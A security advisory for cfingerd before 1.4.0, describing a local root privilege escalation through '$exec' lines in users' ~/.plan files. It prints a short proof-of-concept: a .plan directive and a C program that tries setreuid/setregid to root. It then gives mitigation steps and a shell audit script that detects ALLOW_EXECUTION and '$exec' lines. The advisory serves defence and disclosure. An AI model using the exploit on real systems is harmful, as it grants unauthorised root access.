COMMAND

    cfingerd

SYSTEMS AFFECTED

    cfingerd before 1.4.0

PROBLEM

    Martin Schulze reported the following. A serious bug in cfingerd before
    version 1.4.0 has been reported. It is present in all versions of
    cfingerd from 1.2.0 up to any version of 1.3.2. If configured
    accordingly (ALLOW_EXECUTION enabled), this bug enables any local user
    to execute arbitrary programs with root privileges, because cfingerd
    runs the program named by a "$exec" line in a user's ~/.plan without
    dropping its own privileges. The exploit is quite simple (thanks go to
    Tadek Knapik). You need to add

        $exec /tmp/relinq

    to your ~/.plan file. Then compile the following relinq.c file in
    /tmp:

        #include <stdio.h>
        #include <unistd.h>     /* setregid, setreuid, getuid, getgid */

        int main(void)
        {
            printf("Root exploit test\n");
            /* Only succeeds when cfingerd runs the $exec program as root;
               on a fixed version both calls fail and the ids stay those
               of the unprivileged user. */
            setregid(0, 0);
            setreuid(0, 0);
            printf("User: %d, group: %d.\n", (int) getuid(), (int) getgid());
            return 0;
        }

SOLUTION

    You are safe if you have disabled ALLOW_EXECUTION in your cfingerd.conf
    file in section "internal_config", i.e. that file contains a line
    "-ALLOW_EXECUTION". This is the default configuration of this package.
    If you use the default cfingerd.conf file as shipped with the
    distribution you are safe. You should still upgrade.

    - 1st Immediately turn off ALLOW_EXECUTION in your cfingerd.conf
      file.
    - 2nd Upgrade to the most recent version, cfingerd 1.4.0, to be
      found at the primary site

         ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/
         ftp://metalab.unc.edu/pub/Linux/system/network/finger/
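    The two checks an administrator would want here, as an added example
    that is not part of the original advisory or of the cfingerd package:
    one function inspects a cfingerd.conf for the ALLOW_EXECUTION flag,
    the other lists ~/.plan files under a home directory base that carry a
    "$exec" directive. It assumes the "internal_config" section lists its
    flags one per line, each prefixed with "+" (enabled) or "-" (disabled),
    exactly as the advisory's "-ALLOW_EXECUTION" line shows; the config
    and .plan files it creates under a temporary directory are constructed
    sample data.

```shell
#!/bin/sh
# Added example, not from the cfingerd project. Assumption: flags in the
# internal_config section appear one per line as "+FLAG" or "-FLAG".

# check_allow_execution FILE
# Returns 0 if ALLOW_EXECUTION is disabled, 1 if enabled, 2 if no such
# line is present (the last matching line wins).
check_allow_execution() {
    line=$(grep '^[[:space:]]*[+-]ALLOW_EXECUTION[[:space:]]*$' "$1" | tail -n 1)
    case "$line" in
        *-ALLOW_EXECUTION*) echo "$1: ALLOW_EXECUTION disabled (safe)"; return 0 ;;
        *+ALLOW_EXECUTION*) echo "$1: ALLOW_EXECUTION ENABLED (vulnerable before 1.4.0)"; return 1 ;;
        *)                  echo "$1: no ALLOW_EXECUTION line found"; return 2 ;;
    esac
}

# find_exec_plans HOMEBASE
# Prints every HOMEBASE/*/.plan containing a "$exec" line and returns the
# number of such files as the exit status (0 means none found).
find_exec_plans() {
    n=0
    for f in "$1"/*/.plan; do
        [ -f "$f" ] || continue
        if grep -q '^[[:space:]]*\$exec' "$f"; then
            echo "$f"
            n=$((n + 1))
        fi
    done
    return "$n"
}

# --- constructed sample data (not from a real system) ---
WORK=$(mktemp -d)
SAFE_CONF="$WORK/cfingerd.conf.safe"
VULN_CONF="$WORK/cfingerd.conf.vuln"
HOMEBASE="$WORK/home"

printf 'INTERNAL_CONFIG = {\n    -ALLOW_MULTIPLE_CONNECTIONS\n    -ALLOW_EXECUTION\n}\n' > "$SAFE_CONF"
printf 'INTERNAL_CONFIG = {\n    -ALLOW_MULTIPLE_CONNECTIONS\n    +ALLOW_EXECUTION\n}\n' > "$VULN_CONF"

mkdir -p "$HOMEBASE/alice" "$HOMEBASE/bob" "$HOMEBASE/carol"
printf 'Working on the 1.4.0 release.\n' > "$HOMEBASE/alice/.plan"
printf '$exec /tmp/some-program\n' > "$HOMEBASE/bob/.plan"
# carol has no .plan at all

# Stand-alone demonstration; "|| true" keeps the script going under set -e.
check_allow_execution "$SAFE_CONF" || true
check_allow_execution "$VULN_CONF" || true
find_exec_plans "$HOMEBASE" || true
```

    The exit-status convention lets both functions be used directly in a
    cron job or an audit script: a non-zero status from either one is the
    signal that the ALLOW_EXECUTION step of the advisory still applies on
    that host.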